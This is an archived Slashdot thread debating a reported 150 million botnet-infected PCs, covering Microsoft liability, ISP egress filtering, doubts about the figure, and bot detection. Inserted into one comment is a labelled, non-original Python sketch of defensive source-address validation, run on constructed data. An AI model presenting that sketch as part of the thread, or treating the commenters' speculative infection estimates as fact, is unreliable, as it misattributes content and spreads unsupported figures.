bigberk (547360) | more than 7 years ago | (#17777566)

There could definitely be a class action lawsuit at some point facing Microsoft. That one company has a mass deployment of an operating system that is obviously dreadfully vulnerable to infection. Some might reasonably argue that Microsoft has an implied duty to provide a reliable operating system, as the backbone infrastructure of the modern computing world.

Among the victims of the easily infectable Windows platform are:
1) Large internet service providers, who suffer tremendous bandwidth costs due to DDoS attacks and spam
2) Sites that have been forced offline or had skyrocketing costs due to DDoS attacks
3) Businesses which suffer downtime due to networks congested with worm activity

I think it is time for an ambitious group of lawyers to start barking up this tree. It wouldn't be so big a concern if it wasn't for the fact that Microsoft has made a specific effort to rollout their operating system as a foundation of the world's business computing. They are providing faulty infrastructure.

Re:Class action (1)

doroshjt (1044472) | more than 7 years ago | (#17777830)

Sweet, and like every other class action suit I've been a part of, I'll get my $19 dollar credit towards a future purchase of Microsoft's antivirus software. Class action lawsuits are crap and should be outlawed; the only one it helps is the lawyer who is filing it. Here are my successful class action lawsuits: I got 12 bucks, I think, from the music industry 'cause of price collusion, I got $.39 credit for some Amex lawsuit, and I got or am getting a 10 dollar credit on my Sprint bill for the next two years if I sign up for a two year contract. Pretty soon I'm going to retire on all my successful lawsuits.

Re:Class action (1)

bigberk (547360) | more than 7 years ago | (#17777886)

I suggested that the claimants be a few large businesses, not millions of small fish. Many businesses have suffered huge costs due to attacks coming from Windows platforms.

Re:Class action (1)

dave562 (969951) | more than 7 years ago | (#17777892)

> There could definitely be a class action lawsuit at some point facing Microsoft.

Maybe if you live in some fantasy world. What happens to your class action lawsuit when Microsoft points to whole slews of computers that aren't infected and that are running just fine? Trying to fine Microsoft for stupid computer users is like trying to fine Ford for drunk driving deaths. Or fine Smith and Wesson for murders.

Re:Class action (1)

fireboy1919 (257783) | more than 7 years ago | (#17778088)

But they don't make any claims as to its security. Microsoft's software exceeds what it claims to do.

Read the EULA. It claims to be able to do nothing. You're using it with the hope that it exceeds the claims, but that's *your* expectation, not Microsoft's promise. Making an insecure product that you aren't claiming is secure isn't against the law.

Suing Microsoft for insecurity is like suing Kool-Aid because their drink doesn't taste like Mountain Dew.

Of course, IMHO the reason we're in this mess is Microsoft's usage of their monopoly, which is actionable. I doubt we'd be in this mess if someone had done something about it because the attack vectors of IE and Office would probably be gone from the OS when the company was split.

So that's what we should be hoping for. I'd rather not have new laws that make incompetence a crime. After all, nobody's perfect. We'd all end up guilty, and I don't want that kind of power in the hands of our leaders.

Aborted cliche (3, Funny)

Tsar (536185) | more than 7 years ago | (#17777586)

I was going to post something about imagining a Beowulf cluster of these or of welcoming our new botnet overlords, but the bot on my computer started threateNO CARRIER

Evidence? (1)

N7DR (536428) | more than 7 years ago | (#17777646)

I've seen this reported several times in the past few days. But nowhere have I seen any kind of explanation as to how he arrived at this number. Frankly, I find it unswallowable without some fairly convincing evidence. Maybe he has such evidence (I sure hope so), but if so, where is it?

Yes it is possible to eliminate (3, Interesting)

gurps_npc (621217) | more than 7 years ago | (#17777770)

The single reason why spam and other net abuses go on is that there are no worldwide laws. It is a public crime; people can click on the spam and hunt down the person committing the crime simply by following the money. They get away with it because if one country creates an effective law and enforces it, the spammers can just move to another country.

You want to cure it? Have ICANN come up with a set of standard, simple guidelines. Not censorship, just simple things like "No sending out spam emails", "No Zombie Bot". Then have ICANN rule that failure to pass laws enforcing these guidelines (individual countries get to decide what the actual law would be) or failure to cooperate to enforce them results in disconnect for that country from the rest of the internet. That would be ICANN's sole enforcement power.

Give people a 3 month warning, then start disconnecting the countries that are the worst violators, giving the secondary violators another warning. In one month, if they pass new laws or fund new enforcements, they get a trial hook up again.

I predict one year of nastiness, during which all countries scramble to create and enforce real laws.

The worst of the worst of the offending countries, might split off and form a secondary, 'dangerous' internet. But who would care.

Would I trust this problem to law enforcement? No. (0)

Anonymous Coward | more than 7 years ago | (#17777774)

This is not the sort of issue I'd trust law enforcement to know how to deal with. This is a technical problem, and a technical, not social, solution is what is needed.

There are a variety of solutions available to us, actually:
1) Mac OS X - good for home users and multimedia creators/editors
2) OpenBSD - basically the most secure OS around
3) Linux - distributions like Ubuntu offer a great general-purpose desktop system
4) Solaris - more often used on servers, but also makes a great workstation OS
5) FreeBSD - a mix of the above: quality, usability, reliability, efficiency, security

The one thing people will point out as missing is a system for gaming. That's where Mac OS X comes in. As it becomes more popular, more game developers will realize that it's just the sort of system they wish to target. The fairly uniform hardware means it's a lot more like a typical console system, and thus far easier to develop for. Furthermore, Cocoa offers great multimedia features not found in other systems. It's essentially everything they could ask for.

Guns don't kills people... (0)

Anonymous Coward | more than 7 years ago | (#17777784)

POC

Go to tech store.
Buy Windows machine
Plug it into high-speed internet
Connect to internet
Leave machine running for some time
Check to see if it is 0WN3D or zombified
he he he
post back to slashdot
make a blog of it
get it sloshedated
profit

imho 50% more likely (0, Troll)

Qbertino (265505) | more than 7 years ago | (#17777914)

I'd say the real number is closer to 50%. Lots of bots out there that make an effort not to be noticed and just bog down the system. I hear from countless Windows users how slow their boxes are. I'd say it's a sure guess that at least 60% of those are compromised.

Re:imho 50% more likely (1)

geekoid (135745) | more than 7 years ago | (#17778166)

I'd say it's 100% of all computers because bots make themselves hard to find, therefore if you don't find one, there must be one there.

The ISPs could help stop this (4, Interesting)

vinn01 (178295) | more than 7 years ago | (#17777958)

I blame the ISPs for allowing traffic to leave their networks with spoofed IP addresses. That is - passing IP packets that are sourced within their network with IP addresses that are not within their network.

Botnets spoof IP addresses to make it harder to track down the bots. But the ISPs know where the bots are and could kill them, or filter them, if they had the testicles to do it. By passing the spoofed IP addressed traffic they make it harder for the rest of the world to filter the bots.

Botnets would be a heck of a lot easier to filter, and choke, if valid IP addresses were forced on all traffic.
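The source-address check this comment describes, as an added example that is not part of the comment or of any ISP's tooling: a Python sketch that validates each packet's source against the prefixes assigned to the port it arrived on. The prefixes are documentation ranges, and the port names and flow records are constructed for illustration.

```python
import ipaddress
from collections import Counter

# Constructed example: prefixes assigned to each customer-facing port
# (documentation address ranges; port names are hypothetical).
ASSIGNED = {
    "cust-port-1": ["192.0.2.0/28"],
    "cust-port-2": ["192.0.2.16/28", "2001:db8:10::/48"],
    "cust-port-3": ["198.51.100.0/24"],
}

# Constructed flow records: (ingress port, source address).
FLOWS = [
    ("cust-port-1", "192.0.2.5"),        # source matches the port's prefix
    ("cust-port-1", "203.0.113.9"),      # source not in any ISP prefix
    ("cust-port-2", "192.0.2.5"),        # ISP address, but another customer's
    ("cust-port-2", "2001:db8:10::1"),   # valid IPv6 source
    ("cust-port-3", "10.1.2.3"),         # private address leaking out
    ("cust-port-3", "not-an-ip"),        # malformed record
]

def build_table(assigned):
    """Parse prefix strings into network objects, keyed by port."""
    return {port: [ipaddress.ip_network(p) for p in prefixes]
            for port, prefixes in assigned.items()}

def _covers(nets, addr):
    return any(n.version == addr.version and addr in n for n in nets)

def classify(port, src, table):
    """Return 'pass', 'drop-wrong-port', 'drop-external' or 'drop-invalid'."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return "drop-invalid"
    if _covers(table.get(port, []), addr):
        return "pass"
    # The address is ours but belongs to a different customer port.
    for other, nets in table.items():
        if other != port and _covers(nets, addr):
            return "drop-wrong-port"
    return "drop-external"

def spoof_report(flows, table):
    """Count dropped packets per ingress port: the port, not the forged
    source address, identifies where the sending machine really is."""
    report = Counter()
    for port, src in flows:
        if classify(port, src, table) != "pass":
            report[port] += 1
    return report

if __name__ == "__main__":
    table = build_table(ASSIGNED)
    for port, src in FLOWS:
        print(f"{port:12} {src:16} {classify(port, src, table)}")
    print(dict(spoof_report(FLOWS, table)))
```
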

I wonder how they got that 150M number? (4, Insightful)

Darth Muffin (781947) | more than 7 years ago | (#17778038)

I wonder how they got that 150M number--if it's the number of Bots out there or the number of infected PCs? If it's the former, and I suspect it is, you can't equate that to the number of PCs. One PC can be a member of several botnets. From what I've seen (and most of you have probably too), a PC either seems to be clean or has 14 bots and 95 pieces of spyware on it depending on the user's habits and training.

This will change with Vista (5, Insightful)

centron (61482) | more than 7 years ago | (#17778070)

After getting feedback that the majority of their users have Spyware installed on their systems, Microsoft decided to incorporate spyware directly into the OS (embrace and extend). With the release of Microsoft Vista, your computer will come with software that runs silently in the background, regularly checks in with their network, and can be completely disabled remotely, similar to botnet software produced by others.

While this system is not pre-configured to send spam or generate DDOS attacks like many other botnets, it does have the ability to download new functionality in the background through Windows Update, so this capability could be added at a later date if enough customers continue to install third party botnets. This means that while your Vista computer is already part of a botnet out of the box, it's fairly dormant. As an indication of the ominous potential of this enhanced system, Microsoft is calling it 'Windows Activation'.

Riddle me this, botnet... (1)

geekoid (135745) | more than 7 years ago | (#17778132)

Let's say I sit down at a computer and I want to find out if it is being used as a botnet.
What is the best way to go about it? Monitor ports? Is there a piece of software that can detect it for me? Preferably something I can run anytime, but not have it loaded when I am not running it. I.e. not like antivirus software.

Ideally something whose output isn't intimidating to a user that may need to read the result back to me. I'm thinking family computers here.
